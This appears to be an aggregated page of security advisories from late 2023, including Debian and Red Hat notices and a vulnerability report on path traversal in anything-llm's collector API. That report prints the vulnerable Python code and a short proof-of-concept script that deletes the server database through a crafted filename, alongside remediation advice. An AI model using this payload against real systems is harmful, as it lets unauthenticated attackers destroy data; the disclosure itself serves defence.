The Ads by datafeedr.com plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 1.1.3 via the 'dfads_ajax_load_ads' function. This allows unauthenticated attackers to execute code on the server. The parameters of the callable function are limited, they cannot be specified arbitrarily.

CVE-2023-5843: dfads.class.php in ads-by-datafeedrcom/tags/1.1.3/inc – WordPress Plugin Repository

Improper Input Validation in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

**Description**

The /process endpoint of the python API (in collector/api.py) exposes an endpoint waiting for a POST request with a parameter named filename :

    @api.route("/process", methods=["POST"])
    def process_file():
        content = request.json
        target_filename = content.get("filename")
        print(f"Processing {target_filename}")
        success, reason = process_single(WATCH_DIRECTORY, target_filename)
        return json.dumps(
            {"filename": target_filename, "success": success, "reason": reason}
        )
    

Then, the filename is passed to the process_single function :

    def process_single(directory, target_doc):
      if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
      
      if os.path.exists(f"{directory}/{target_doc}") is False: 
        print(f"{directory}/{target_doc} does not exist.")
        return (False, f"{directory}/{target_doc} does not exist.")
    
      filename, fileext = os.path.splitext(target_doc)
      if filename in ['.DS_Store'] or fileext == '': return False
      if fileext == '.lock':
        print(f"{filename} is locked - skipping until unlocked")
        return (False, f"{filename} is locked - skipping until unlocked")
    
      if fileext not in FILETYPES.keys():
        print(f"{fileext} not a supported file type for conversion. It will not be processed.")
        move_source(new_destination_filename=target_doc, failed=True, remove=True)
        return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")
    

If filename **HAS** a file extension and that extension **IS NOT** among theses extensions :

    FILETYPES = {
        '.txt': as_text,
        '.md': as_markdown,
        '.pdf': as_pdf,
        '.docx': as_docx,
        '.odt': as_odt,
        '.mbox': as_mbox, 
    }
    

and if the filename points to an existing file, the following function is called (with failed=True, remove=True) :

    def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
        if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
            print(f"{new_destination_filename} deleted from filesystem")
            os.remove(f"{working_dir}/{new_destination_filename}")
            return
     
    

Thus, the file is deleted.

However, since the parameter filename is not sanitized against **PATH TRAVERSAL**, a filename such as ../../server/storage/anythingllm.db can be used to remove the database of the website.

**Proof of Concept**

    # PoC.py
    import requests
    
    if __name__ == "__main__":
        server_ip = "127.0.0.1"
        file_to_delete = "../../server/storage/anythingllm.db"
    
        data = {"filename" : file_to_delete}
        requests.post(f"http://{server_ip}:8888/process", json=data)
    

**Remediation****User input should be sanitized**

For file name parameters, Flask implement a function named secure_filename to manage filename securely, documentation can be found here. The function os.path.basename could also be used.

Moreover, it may be a better practice to use os.path.join instead of concatenating strings using +.

**Python API should only listen on loopback interface**

In the documentation (collector/README.md), the following command is mentioned to run the Python API :

    flask run --host '0.0.0.0' --port 8888
    

However, simply listening on 127.0.0.1 should be enough. The docker version seems 'safe' because only the port 3001 is exposed to the host (however it is still reachable from the docker0 interface on the host, but the attacker would need to be logged in the server).  
But using the manual installation method, it may results in a Python API exposed to the internet. Here is an example of an instance exposed to the Internet on shodan :

**Impact**

This vulnerability allows an unauthenticated attacker to delete almost any file, such as the server database.

**Occurrences**

CVE-2023-5832: Improper input validation leads to arbitrary file deletion in anything-llm

Improper Access Control in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

Expand Up @@ -239,6 +239,16 @@ function systemEndpoints(app) { async (request, response) \=> { try { const body \= reqBody(request);  
// Only admins can update the ENV settings. if (multiUserMode(response)) { const user \= await userFromSession(request, response); if (!user || user?.role !== "admin") { response.sendStatus(401).end(); return; } }  
const { newValues, error } \= updateENV(body); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ newValues, error }); Expand All @@ -254,11 +264,21 @@ function systemEndpoints(app) { \[validatedRequest\], async (request, response) \=> { try { // Cannot update password in multi - user mode. if (multiUserMode(response)) { response.sendStatus(401).end(); return; }  
const { usePassword, newPassword } \= reqBody(request); const { error } \= updateENV({ AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }); const { error } \= updateENV( { AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ success: !error, error }); } catch (e) { console.log(e.message, e); Expand Down Expand Up @@ -293,8 +313,15 @@ function systemEndpoints(app) { limit\_user\_messages: false, message\_limit: 25, }); process.env.AUTH\_TOKEN \= null; process.env.JWT\_SECRET \= process.env.JWT\_SECRET ?? v4(); // Make sure JWT\_SECRET is set for JWT issuance.  
updateENV( { AuthToken: null, JWTSecret: process.env.JWT\_SECRET ?? v4(), }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); await Telemetry.sendTelemetry("enabled\_multi\_user\_mode"); response.status(200).json({ success: !!user, error }); } catch (e) { Expand Down

CVE-2023-5833: Prevent updates of specific keys via API (#256) · Mintplex-Labs/anything-llm@d5b1f84

Debian Linux Security Advisory 5537-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in bypass of sandbox restrictions or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5537-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 27, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-11CVE ID         : CVE-2023-22067 CVE-2023-22081Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in bypass of sandbox restrictions or denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 11.0.21+9-1~deb11u1.We recommend that you upgrade your openjdk-11 packages.For the detailed security status of openjdk-11 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-11Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmU74DgACgkQEMKTtsN8Tjbrug/+K+/T0ydiyOhIQ/4s4rrQr2YBx0miVGaBTFjuAEw/YduTbIT4eLsJsWOZeQ2dg2ZkIFtW1Ngs7QUaA7WgAjgAu7tnW90rZYFiQalcxPlwAmnSWZSYM9SSaW9p/AHARm8uSQ0YKjlnskCEDVXODVggzOQLpvVF2oA8MA+1Rtb6hnl1W4u+IDXvhXCZzniKheuAe/G9iz0nY8wHgEVNfIc1KO+MKFyD8Z655kH8qgGuMcyORGYDFDX4l6luorc/dA15dr90pokg0TD/2L2dIbkEsj0zOePzU6yZsYTBgQ878Y8gdJnCirpSS/ZaCKWAOSX+fARW+wVUsscvpUh/TcDyHEKh8EjA05ahaiqp6/gvScz8H9rbebYw32glFEu89JMgfDLAI137YLqkfOWhLIKvCzZ+u+drpg7Hf0yjDU0dPWWzc0KHd/asClDxyec5N5zlDCI7eGvY2zxH0TsGqiyed2GVTPi1TR3FWRRvlCC1uKiZF9vdmQZTubDzqpjR7gGbVIyGfn6lYDOxqhOTq7ftoJ3+BjCBxuaxZmHBtw2QzQCb8pJalQj1D2IgqsMBAt92pdD+3DyXjEYnFHNRr330uDiVg2ZeadatRkm+VwiI+pJGwkl+1Xrom1Mg2SQkeNtiY5IO3lGAjIhU8b0TkbrgdMoM3j0zI4dQkX8+BRV5YKM==UEly-----END PGP SIGNATURE-----

Debian Security Advisory 5537-1

Red Hat Security Advisory 2023-6161-01 - The Migration Toolkit for Containers 1.7.14 is now available. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6161.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Migration Toolkit for Containers (MTC) 1.7.14 security and bug fix update  
Advisory ID:        RHSA-2023:6161-01  
Product:            Red Hat Migration Toolkit  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6161  
Issue date:         2023-10-30  
Revision:           01  
CVE Names:          CVE-2023-29406  
====================================================================

Summary: 

The Migration Toolkit for Containers (MTC) 1.7.14 is now available.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

Security Fix(es) from Bugzilla:

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* golang: net/http: insufficient sanitization of Host header (CVE-2023-29406)

* golang: crypto/tls: slow verification of certificate chains containing large RSA keys (CVE-2023-29409)

* golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)

* golang: html/template:  improper handling of HTML-like comments within script contexts (CVE-2023-39318)

* golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321)

* golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-29406

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6161-01

Red Hat Security Advisory 2023-6158-01 - An update is now available for Red Hat Ansible Automation Platform 2.4.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6158.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix UpdateAdvisory ID:        RHSA-2023:6158-01Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6158Issue date:         2023-10-30Revision:           01CVE Names:          CVE-2023-43665====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):*  automation-controller: Django: Denial-of-service possibility in django.utils.text.Truncator (CVE-2023-43665)* python3-urllib3/python39-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes for automation controller:* automation-controller has been updated to 4.4.7* Cleaned up SOS report passwords (AAP-17544)* Customers using the \"infra.controller_configuration\" collection (which uses \"ansible.controller\" collection) to update their Ansible Automation Platform environment no longer receive an HTTP 499 response (AAP-17422)Additional changes:* python3-urllib3/python39-urllib3 has been updated to 1.26.18Solution:CVEs:CVE-2023-43665References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2023-6158-01

Red Hat Security Advisory 2023-6156-01 - The components for Red Hat OpenShift support for Windows Containers 8.1.0 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle. Issues addressed include a bypass vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6156.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift support for Windows Containers 8.1.0 security updateAdvisory ID:        RHSA-2023:6156-01Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6156Issue date:         2023-10-30Revision:           01CVE Names:          CVE-2023-2431====================================================================Summary: The components for Red Hat OpenShift support for Windows Containers 8.1.0 are now available.  This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server nodes.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* kubernetes: Bypass of seccomp profile enforcement (CVE-2023-2431)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-2431References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6156-01

Red Hat Security Advisory 2023-6144-01 - An update for custom-metrics-autoscaler-adapter-container, custom-metrics-autoscaler-admission-webhooks-container, custom-metrics-autoscaler-container, custom-metrics-autoscaler-operator-bundle-container, and custom-metrics-autoscaler-operator-container is now available for the Custom Metric Autoscaler operator for Red Hat OpenShift. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6144.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Custom Metric Autoscaler operator for Red Hat OpenShift security updateAdvisory ID:        RHSA-2023:6144-01Product:            OpenShift Custom Metrics AutoscalerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6144Issue date:         2023-10-30Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for custom-metrics-autoscaler-adapter-container, custom-metrics-autoscaler-admission-webhooks-container, custom-metrics-autoscaler-container, custom-metrics-autoscaler-operator-bundle-container, and custom-metrics-autoscaler-operator-container is now available for the Custom Metric Autoscaler operator for Red Hat OpenShift.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6144-01

Red Hat Security Advisory 2023-6022-01 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6022.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish:6 security updateAdvisory ID:        RHSA-2023:6022-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6022Issue date:         2023-10-27Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6022-01

Red Hat Security Advisory 2023-6021-01 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6021.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish:6 security updateAdvisory ID:        RHSA-2023:6021-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6021Issue date:         2023-10-27Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Tag

#js